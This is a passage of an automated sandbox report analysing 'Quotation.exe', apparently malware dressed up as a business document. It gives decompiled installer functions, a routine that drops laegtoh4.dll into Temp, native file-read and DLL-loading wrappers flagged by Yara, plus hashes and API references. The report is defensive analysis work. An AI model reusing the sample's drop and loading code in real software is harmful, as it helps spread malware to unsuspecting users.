                                                • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                • lstrcatA.KERNEL32(0040A440,00000000,0040A440,000000F8,00000000), ref: 0040223A
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                  • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,7519EA30), ref: 00404DDA
                                                  • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E12
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E2C
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E3A
                                                • SHFileOperationA.SHELL32(?,?,0040A440,0040A440,00000000,0040A440,000000F8,00000000), ref: 0040225E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                • String ID:
                                                • API String ID: 3674637002-0
                                                • Opcode ID: c237d85bab7d5b7f9d91a756771a76c1e0cf33c16846e85dec699fb32a0fce7f
                                                • Instruction ID: 7d0402f7bcad65a2a3fbaa89d286b4c3fac030f19c38f74fe4853062ba68fef2
                                                • Opcode Fuzzy Hash: c237d85bab7d5b7f9d91a756771a76c1e0cf33c16846e85dec699fb32a0fce7f
                                                • Instruction Fuzzy Hash: 6E1186B1904259ABCB00EFEA894499EB7F8DF45314F10413BB114FB2D1D678C945DB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 61%
                                                			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x409400->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x409410 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x409417 = 1;
				 *0x409414 = _t11 & 0x00000001;
				 *0x409415 = _t11 & 0x00000002;
				 *0x409416 = _t11 & 0x00000004;
				E004059FD(_t18, _t24, _t26, 0x40941c,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x409400);
				_push(_t14);
				_push(_t26);
				E00405939();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                0x00401d9c
                                                0x00401db5
                                                0x00401dbf
                                                0x00401dc4
                                                0x00401dcf
                                                0x00401dd6
                                                0x00401de8
                                                0x00401dee
                                                0x00401df3
                                                0x00401dfd
                                                0x00402536
                                                0x00401581
                                                0x004028d7
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • GetDC.USER32(?), ref: 00401D95
                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                • CreateFontIndirectA.GDI32(00409400), ref: 00401DFD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirect
                                                • String ID:
                                                • API String ID: 3272661963-0
                                                • Opcode ID: 921b8d9f80d85dae4e5c0b3fab4b65544386c45d95e077db1074512b697c4466
                                                • Instruction ID: 0bf8db4aad66ff6bc29ff827cc3fc14c5ec2529e919bd09f72257f1192ea8504
                                                • Opcode Fuzzy Hash: 921b8d9f80d85dae4e5c0b3fab4b65544386c45d95e077db1074512b697c4466
                                                • Instruction Fuzzy Hash: B0F0627194C650BFE7015BB0AE1ABAA3F64A755305F148479F241BA1E3C7BC0906CB7E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040380E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0040380E(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405952(__ecx, "1033");
				while(1) {
					_t26 =  *0x42f464;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42f428 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42f460;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42ec00 = _t18[1];
					 *0x42f4c8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42ebfc = _t23;
						E00405939(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a880, E004059FD(_t13, _t24, _t26, "ACID Setup", 0xfffffffe));
						_t11 =  *0x42f44c;
						_t27 =  *0x42f448;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E004059FD(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                0x00403812
                                                0x00403817
                                                0x0040381d
                                                0x00403822
                                                0x00403822
                                                0x0040382a
                                                0x00000000
                                                0x00000000
                                                0x00403832
                                                0x0040383a
                                                0x0040383c
                                                0x00403842
                                                0x00403842
                                                0x00403844
                                                0x00403850
                                                0x00000000
                                                0x00000000
                                                0x00403854
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403856
                                                0x0040385b
                                                0x00403864
                                                0x0040386a
                                                0x0040386f
                                                0x00403883
                                                0x0040388e
                                                0x004038a6
                                                0x004038ac
                                                0x004038b1
                                                0x004038b9
                                                0x004038da
                                                0x004038da
                                                0x004038da
                                                0x004038bb
                                                0x004038bd
                                                0x004038bd
                                                0x004038c1
                                                0x004038c8
                                                0x004038c8
                                                0x004038cd
                                                0x004038d3
                                                0x004038d3
                                                0x00000000
                                                0x004038bd
                                                0x00403871
                                                0x00403876
                                                0x0040387f
                                                0x00403878
                                                0x00403878
                                                0x00403878
                                                0x00403876

                                                APIs
                                                • SetWindowTextA.USER32(00000000,ACID Setup), ref: 004038A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: 1033$ACID Setup
                                                • API String ID: 530164218-3552310469
                                                • Opcode ID: 2e6dc91df21bd32c357a542dcf52ef06f39965d5d1ff0679fec69d0b837b48a4
                                                • Instruction ID: 80233f8be37abeb08f7c7b571dfb44847f9404f2ebf597b18c2e1cddc1fdd98f
                                                • Opcode Fuzzy Hash: 2e6dc91df21bd32c357a542dcf52ef06f39965d5d1ff0679fec69d0b837b48a4
                                                • Instruction Fuzzy Hash: 1B11D476B002119BC724BF56DC40E333BEDEB5476535881BBF801673A1DA3999068A59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404CBD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404CBD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x42a894, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404643(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059DB(0x42a8a0, 0x430000);
								E00405939(0x430000, _t23);
								E00401410(6);
								E004059DB(0x430000, 0x42a8a0);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403E0F(0x413);
					return 0;
				}
				goto L12;
			}





                                                0x00404cc9
                                                0x00404ce6
                                                0x00404cea
                                                0x00404cec
                                                0x00404cec
                                                0x00404cec
                                                0x00404cf3
                                                0x00404cff
                                                0x00404d1f
                                                0x00000000
                                                0x00404d01
                                                0x00404d04
                                                0x00404d0a
                                                0x00404d0c
                                                0x00404d5f
                                                0x00404d5f
                                                0x00404d62
                                                0x00000000
                                                0x00404d72
                                                0x00404d18
                                                0x00404d1a
                                                0x00404d22
                                                0x00404d22
                                                0x00404d25
                                                0x00404d27
                                                0x00404d2d
                                                0x00404d3c
                                                0x00404d42
                                                0x00404d49
                                                0x00404d50
                                                0x00404d57
                                                0x00404d5c
                                                0x00404d2d
                                                0x00000000
                                                0x00404d25
                                                0x00404cff
                                                0x00404ccf
                                                0x00404cda
                                                0x00000000
                                                0x00404cdf
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404D04
                                                • CallWindowProcA.USER32 ref: 00404D72
                                                  • Part of subcall function 00403E0F: SendMessageA.USER32 ref: 00403E21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 931c6e2d3452623f2a390e01c489404f436308da2a52d275820346ecfe2c3dce
                                                • Instruction ID: 4a2947fe1ef1853657b0cd68643acdbb852dff1bff70307e7b65a93a25d4428a
                                                • Opcode Fuzzy Hash: 931c6e2d3452623f2a390e01c489404f436308da2a52d275820346ecfe2c3dce
                                                • Instruction Fuzzy Hash: 11117CB1500208FBDF21AF12DC45A9B3B69AF84764F00813BFB18791E2C3784D519FA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405952(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                0x0040253c
                                                0x0040253c
                                                0x0040253f
                                                0x0040255a
                                                0x00402541
                                                0x00402543
                                                0x00402548
                                                0x0040254f
                                                0x00402561
                                                0x004026da
                                                0x004026da
                                                0x00402567
                                                0x00402579
                                                0x004015c8
                                                0x004015ca
                                                0x00000000
                                                0x004015d0
                                                0x004015ca
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll, xrefs: 00402548, 0040256D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileWritelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll
                                                • API String ID: 427699356-160834357
                                                • Opcode ID: 460f3d3385c81f9ab123a651ab7910130a28ee13f4182e9bce0e3a7b0b2bcfdd
                                                • Instruction ID: 58c959ba46dee6b8a5e8613f63768173e8f239850a52820b4ff069945e253713
                                                • Opcode Fuzzy Hash: 460f3d3385c81f9ab123a651ab7910130a28ee13f4182e9bce0e3a7b0b2bcfdd
                                                • Instruction Fuzzy Hash: 21F0B4B1A04245BFD710EBA59D19BAB3664AB00304F10043BB202B60C2C6BC49419B6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040552F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040552F(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                                0x00405530
                                                0x0040553a
                                                0x0040553c
                                                0x00405543
                                                0x0040554b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040554b
                                                0x0040554d
                                                0x00405551

                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00405535
                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00405543
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-1246513382
                                                • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                • Instruction ID: 889218ce53f6b8cf1f9f6a2aaa16a781c12a56784fee4b43009738821d70e769
                                                • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                • Instruction Fuzzy Hash: 29D0C9B2809EB0BAE31322149C04B9F7A999F5A710F4944A2F540B62E5D2785D818FEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405640, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405640(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                0x0040564c
                                                0x0040564e
                                                0x00405676
                                                0x0040565b
                                                0x00405660
                                                0x0040566b
                                                0x00000000
                                                0x00405688
                                                0x00405674
                                                0x00405674
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405647
                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 0040566E
                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405677
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                • Instruction ID: 346b90764f0d90fbcc61368962881b27d577bfee3f98b87c3a37ae2f5c1fe9f2
                                                • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                • Instruction Fuzzy Hash: 7EF02736209C91EFC2125B288C00A2B6A94EFA1311B540A7AF444F2140C33A9811ABBB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: Quotation.exe PID: 6424 Parent PID: 6372 Quotation.exeCOMMON

                                                Executed Functions

                                                Function 00419DB3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA$HA
                                                • API String ID: 2738559852-181183267
                                                • Opcode ID: 626ca87b58b969c046a3a753cb38a2af31e37882697376742a298c054dc01132
                                                • Instruction ID: 78f4a1ae6b5b580f3ecfaec55e7fbe2e14e3257eeb8910dc7bc4c3a3c9dcf8a8
                                                • Opcode Fuzzy Hash: 626ca87b58b969c046a3a753cb38a2af31e37882697376742a298c054dc01132
                                                • Instruction Fuzzy Hash: B321F8B5200108AFCB18CF99DC85EEB77A9EF8C354F158649FA4DA7241C634E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                0x00419e13
                                                0x00419e1f
                                                0x00419e27
                                                0x00419e32
                                                0x00419e4d
                                                0x00419e55
                                                0x00419e59

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_push(_a8);
				_push(0x104);
				_push( &_v12);
				_v8 =  &_v536;
				_t15 = E0041C650();
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                0x0040acdc
                                                0x0040ace6
                                                0x0040aceb
                                                0x0040acec
                                                0x0040acef
                                                0x0040acf4
                                                0x0040acf9
                                                0x0040ad03
                                                0x0040ad08
                                                0x0040ad0b
                                                0x0040ad0d
                                                0x0040ad15
                                                0x0040ad1a
                                                0x0040ad1a
                                                0x0040ad21
                                                0x0040ad29
                                                0x0040ad2c
                                                0x0040ad2e
                                                0x0040ad42
                                                0x00000000
                                                0x0040ad44
                                                0x0040ad4a
                                                0x0040acfe
                                                0x0040acfe
                                                0x0040acfe

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                0x00419d6f
                                                0x00419d77
                                                0x00419dad
                                                0x00419db1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
